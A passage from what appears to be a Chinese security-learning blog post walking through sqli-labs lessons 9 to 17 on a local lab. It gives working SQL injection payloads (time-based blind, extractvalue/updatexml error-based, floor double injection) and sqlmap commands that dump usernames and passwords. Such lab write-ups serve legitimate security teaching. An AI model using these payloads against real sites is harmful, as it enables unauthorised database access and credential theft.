<p><code>?id=1&#39; and if(ascii(substr(database(),1,1))&gt;115,1,sleep(5)) %23</code></p>
<p><img src="QQ%E6%88%AA%E5%9B%BE20200205194753.png" alt=""></p>
<p>接下来使用sqlmap自动化注入</p>
<p><strong>爆数据库名：</strong></p>
<pre><code>python sqlmap.py -u http://localhost:8088/sqlilabs/Less-9/?id=1 --technique T --dbms mysql --dbs --batch</code></pre><p><strong>爆表名：</strong></p>
<pre><code>python sqlmap.py -u http://localhost:8088/sqlilabs/Less-9/?id=1 --technique T --dbms mysql -D security --tables --batch </code></pre><p><strong>爆列名</strong>：</p>
<pre><code> python sqlmap.py -u http://localhost:8088/sqlilabs/Less-9/?id=1 --technique T --dbms mysql -D security -T users --column --batch</code></pre><p><strong>爆内容 ：</strong></p>
<pre><code>python sqlmap.py -u http://localhost:8088/sqlilabs/Less-9/?id=1 --technique T --dbms mysql -D security -T users -C username,password --dump --batch</code></pre><h5 id="Less-10-基于时间的双引号盲注）"><a href="#Less-10-基于时间的双引号盲注）" class="headerlink" title="Less-10 (基于时间的双引号盲注）"></a>Less-10 (基于时间的双引号盲注）</h5><p><code>?id=1&quot; and sleep(5) %23</code></p>
<p>同上</p>
<h5 id="Less-11-基于错误的POST型单引号字符型注入）"><a href="#Less-11-基于错误的POST型单引号字符型注入）" class="headerlink" title="Less-11(基于错误的POST型单引号字符型注入）"></a>Less-11(基于错误的POST型单引号字符型注入）</h5><p>提交方式改为POST，使用burp进行抓包修改。</p>
<p><code>uname=admin&#39; and 1=1 %23 &amp;passwd=admin&amp;submit=Submit  #成功登录</code></p>
<p><img src="QQ%E6%88%AA%E5%9B%BE20200206125708.png" alt=""></p>
<p><code>uname=admin&#39; and 1=2  %23&amp; passwd=admin&amp;submit=Submit #不能登录</code></p>
<p><img src="%5CQQ%E6%88%AA%E5%9B%BE20200206125727.png" alt=""></p>
<p>存在报错型注入，我们使用extractvalue()函数。</p>
<p><strong>爆数据库</strong></p>
<p><code>uname=admin&#39; and extractvalue(1,concat(0x7e,(select database()),0x7e)) %23</code></p>
<p><img src="QQ%E6%88%AA%E5%9B%BE20200206130037.png" alt=""></p>
<p><strong>爆表名</strong></p>
<p><code>uname=admin&#39; and extractvalue(1,concat(0x7e,(select  group_concat(table_name)  from information_schema.tables where table_schema=database()),0x7e)) %23</code></p>
<p><img src="QQ%E6%88%AA%E5%9B%BE20200206130124.png" alt=""></p>
<p><strong>爆列名</strong></p>
<p><code>uname=admin&#39; and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_shcema.columns where table_name=&#39;users&#39;),0x7e))%23</code></p>
<p><img src="QQ%E6%88%AA%E5%9B%BE20200206130709.png" alt=""></p>
<p><strong>爆用户名密码</strong></p>
<p><code>uname=admin&#39; and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e))%23</code></p>
<p><img src="QQ%E6%88%AA%E5%9B%BE20200206130537.png" alt=""></p>
<p>sqlmap自动化注入：</p>
<p>复制Burpsuite截断的HTTP请求数据包到文本文件中，使用Sqlmap -r 文件路径 -p 指定探测参数。</p>
<h5 id="Less-12-基于错误的双引号POST型字符型变形的注入）"><a href="#Less-12-基于错误的双引号POST型字符型变形的注入）" class="headerlink" title="Less-12(基于错误的双引号POST型字符型变形的注入）"></a>Less-12(基于错误的双引号POST型字符型变形的注入）</h5><p><strong>换成双引号即可；</strong></p>
<p><strong>爆数据库名</strong>：</p>
<p><code>uname=admin&quot; and extractvalue(1,concat(0x7e,(select database(),0x7e)))  &quot;%23</code></p>
<p><strong>爆表名</strong>：</p>
<p><code>uname=admin&quot;  and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())))  and &quot;</code> </p>
<p><strong>爆列名</strong>：</p>
<p><code>uname=admin&quot;  and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=&#39;users&#39;)))  and &quot;</code><br><strong>爆用户名密码：</strong></p>
<p><code>uname=admin“ and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e))%23</code></p>
<h5 id="Less-13-POST单引号变形双注入）"><a href="#Less-13-POST单引号变形双注入）" class="headerlink" title="Less-13(POST单引号变形双注入）"></a>Less-13(POST单引号变形双注入）</h5><p><strong>floor 报错注入</strong></p>
<p><code>1&#39;) union select count(*),concat_ws(&#39;~&#39;,(select user()),(select database()),floor(rand()*2)) as a from information_schema.tables group by a#</code></p>
<p><code>1&#39;) union select count(*),concat_ws(&#39;:&#39;,(select user()),(select database()),floor(rand()*2)) as a from information_schema.tables group by a#</code></p>
<p><strong>爆表名</strong></p>
<p><code>&#39;) union select count(*),concat_ws(&#39;++&#39;,(select table_name from information_schema.tables where table_schema=&#39;security&#39; limit 0,1),floor(rand()*2)) as a from information_schema.tables group by a#</code></p>
<p><strong>爆列名</strong></p>
<p><code>&#39;) union select count(*),concat_ws(&#39;+&#39;,(select column_name from information_schema.columns where table_name=&#39;users&#39; limit 0,1),floor(rand()*2)) as a from information_schema.tables group by a#</code></p>
<p><strong>爆数据</strong></p>
<p><code>&#39;) union select count(*),concat_ws(&#39;;&#39;,(select username from users limit 0,1),floor(rand()*2)) as a from information_schema.tables group by a#</code></p>
<h5 id="Less-14-POST双引号变形双注入）"><a href="#Less-14-POST双引号变形双注入）" class="headerlink" title="Less-14(POST双引号变形双注入）"></a>Less-14(POST双引号变形双注入）</h5><p>将单引号闭合换成双引号即可。</p>
<p>过程同上。</p>
<h5 id="Less-15-基于bool型-时间延迟单引号POST型盲注）"><a href="#Less-15-基于bool型-时间延迟单引号POST型盲注）" class="headerlink" title="Less-15(基于bool型/时间延迟单引号POST型盲注）"></a>Less-15(基于bool型/时间延迟单引号POST型盲注）</h5><p>使用延时注入</p>
<p><code>admin&#39; and if(ascii(substr(database(),1,1))&gt;115,1,sleep(5)) #</code></p>
<p>逐个判断即可；</p>
<h5 id="Less-16-基于bool型-时间延迟双引号POST型盲注）"><a href="#Less-16-基于bool型-时间延迟双引号POST型盲注）" class="headerlink" title="Less-16(基于bool型/时间延迟双引号POST型盲注）"></a>Less-16(基于bool型/时间延迟双引号POST型盲注）</h5><p>根据源码我们可以知道闭合方法： 使用”）进行闭合</p>
<p>使用延时注入</p>
<p>同上。</p>
<h5 id="Less-17-基于错误的更新查询POST注入）"><a href="#Less-17-基于错误的更新查询POST注入）" class="headerlink" title="Less-17(基于错误的更新查询POST注入）"></a>Less-17(基于错误的更新查询POST注入）</h5><p><strong>爆数据库版本</strong></p>
<p><code>uname=admin&amp;passwd=1&#39; and (updatexml(1,concat(0x5c,version(),0x5c),1))#submit=submit</code></p>
<p><strong>爆表名</strong></p>
<p><code>uname=admin&amp;passwd=1&#39; and (updatexml(1,concat(0x5c,(select table_name from information_schema.tables where table_schema=&#39;security&#39; limit 3,1),0x5c),1))#submit=submit</code></p>
<p><strong>爆字段名</strong></p>
<p><code>uname=admin&amp;passwd=1&#39; and (updatexml(1,concat(0x5c,(select password from (select password from users where username=&#39;admin&#39;)aa),0x5c),1))#submit=submit</code></p>
<p><strong>未完待续。。。。</strong></p>
<h5 id="Less-24-二次注入"><a href="#Less-24-二次注入" class="headerlink" title="Less-24(二次注入)"></a>Less-24(二次注入)</h5>
      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/SQL%E6%B3%A8%E5%85%A5%E5%AD%A6%E4%B9%A0/" rel="tag"># SQL注入学习</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2020/03/12/shen-tou-ce-shi-zhu-dong-xin-xi-shou-ji/" rel="prev" title="渗透测试——主动信息收集">
                渗透测试——主动信息收集 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/avatar.gif"
                alt="Shu1L" />
            
              <p class="site-author-name" itemprop="name">Shu1L</p>
              <p class="site-description motion-element" itemprop="description">欢迎来到Shu1L的神秘小屋！</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives">
              
                  <span class="site-state-item-count">42</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">7</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">28</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#SQL注入漏洞学习笔记-靶场总结"><span class="nav-number">1.</span> <span class="nav-text">SQL注入漏洞学习笔记+靶场总结</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#mysql相关知识点"><span class="nav-number">1.0.1.</span> <span class="nav-text">mysql相关知识点</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#Mysql-5-x数据结构"><span class="nav-number">1.0.1.1.</span> <span class="nav-text">Mysql 5.x数据结构</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#增删改查"><span class="nav-number">1.0.1.2.</span> <span class="nav-text">增删改查</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#Mysql常用的几种函数："><span class="nav-number">1.0.1.3.</span> <span class="nav-text">Mysql常用的几种函数：</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#注释"><span class="nav-number">1.0.1.4.</span> <span class="nav-text">注释</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#注入点查找"><span class="nav-number">1.0.1.5.</span> <span class="nav-text">注入点查找</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#注入分类"><span class="nav-number">1.0.2.</span> <span class="nav-text">注入分类</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#异或注入"><span class="nav-number">1.0.2.1.</span> <span class="nav-text">异或注入</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#orderby-注入"><span class="nav-number">1.0.2.2.</span> <span class="nav-text">orderby 注入</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#注入位置"><span class="nav-number">1.0.2.3.</span> <span class="nav-text">注入位置</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#SQL注入绕过机制"><span class="nav-number">1.0.3.</span> <span class="nav-text">SQL注入绕过机制</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#大小写绕过"><span class="nav-number">1.0.3.1.</span> <span class="nav-text">大小写绕过</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#双写绕过"><span class="nav-number">1.0.3.2.</span> <span class="nav-text">双写绕过</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#编码绕过"><span class="nav-number">1.0.3.3.</span> <span class="nav-text">编码绕过</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#内联注释绕过"><span class="nav-number">1.0.3.4.</span> <span class="nav-text">内联注释绕过</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#sqlmap基础使用方法"><span class="nav-number">1.0.4.</span> <span class="nav-text">sqlmap基础使用方法</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#sqlmap简介"><span class="nav-number">1.0.4.1.</span> <span class="nav-text">sqlmap简介</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#sqli-labs靶场实战"><span class="nav-number">1.0.5.</span> <span class="nav-text">sqli-labs靶场实战</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#less-1-基于错误的GET单引号字符型注入）"><span class="nav-number">1.0.5.1.</span> <span class="nav-text">less-1 (基于错误的GET单引号字符型注入）</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#Less-2-（基于错误的GET整型注入）"><span class="nav-number">1.0.5.2.</span> <span class="nav-text">Less-2 （基于错误的GET整型注入）</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#Less-3-（基于错误的GET单引号变形字符型注入）"><span class="nav-number">1.0.5.3.</span> <span class="nav-text">Less-3 （基于错误的GET单引号变形字符型注入）</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#Less-4（基于错误的GET双引号字符型注入）"><span class="nav-number">1.0.5.4.</span> <span class="nav-text">Less-4（基于错误的GET双引号字符型注入）</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#Less-5（双注入GET单引号字符型注入）"><span class="nav-number">1.0.5.5.</span> <span class="nav-text">Less-5（双注入GET单引号字符型注入）</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#Less-6-双注入GET双引号字符型注入）"><span class="nav-number">1.0.5.6.</span> <span class="nav-text">Less-6 (双注入GET双引号字符型注入）</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#Less-7-导出文件GET字符型注入）"><span class="nav-number">1.0.5.7.</span> <span class="nav-text">Less-7(导出文件GET字符型注入）</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#Less-8-基于布尔的盲注）"><span class="nav-number">1.0.5.8.</span> <span class="nav-text">Less-8 (基于布尔的盲注）</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#Less-9（基于时间的GET单引号盲注）"><span class="nav-number">1.0.5.9.</span> <span class="nav-text">Less-9（基于时间的GET单引号盲注）</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#Less-10-基于时间的双引号盲注）"><span class="nav-number">1.0.5.10.</span> <span class="nav-text">Less-10 (基于时间的双引号盲注）</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#Less-11-基于错误的POST型单引号字符型注入）"><span class="nav-number">1.0.5.11.</span> <span class="nav-text">Less-11(基于错误的POST型单引号字符型注入）</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#Less-12-基于错误的双引号POST型字符型变形的注入）"><span class="nav-number">1.0.5.12.</span> <span class="nav-text">Less-12(基于错误的双引号POST型字符型变形的注入）</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#Less-13-POST单引号变形双注入）"><span class="nav-number">1.0.5.13.</span> <span class="nav-text">Less-13(POST单引号变形双注入）</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#Less-14-POST双引号变形双注入）"><span class="nav-number">1.0.5.14.</span> <span class="nav-text">Less-14(POST双引号变形双注入）</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#Less-15-基于bool型-时间延迟单引号POST型盲注）"><span class="nav-number">1.0.5.15.</span> <span class="nav-text">Less-15(基于bool型&#x2F;时间延迟单引号POST型盲注）</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#Less-16-基于bool型-时间延迟双引号POST型盲注）"><span class="nav-number">1.0.5.16.</span> <span class="nav-text">Less-16(基于bool型&#x2F;时间延迟双引号POST型盲注）</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#Less-17-基于错误的更新查询POST注入）"><span class="nav-number">1.0.5.17.</span> <span class="nav-text">Less-17(基于错误的更新查询POST注入）</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#Less-24-二次注入"><span class="nav-number">1.0.5.18.</span> <span class="nav-text">Less-24(二次注入)</span></a></li></ol></li></ol></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Shu1L</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Pisces</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
          <span id="scrollpercent"><span>0</span>%</span>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
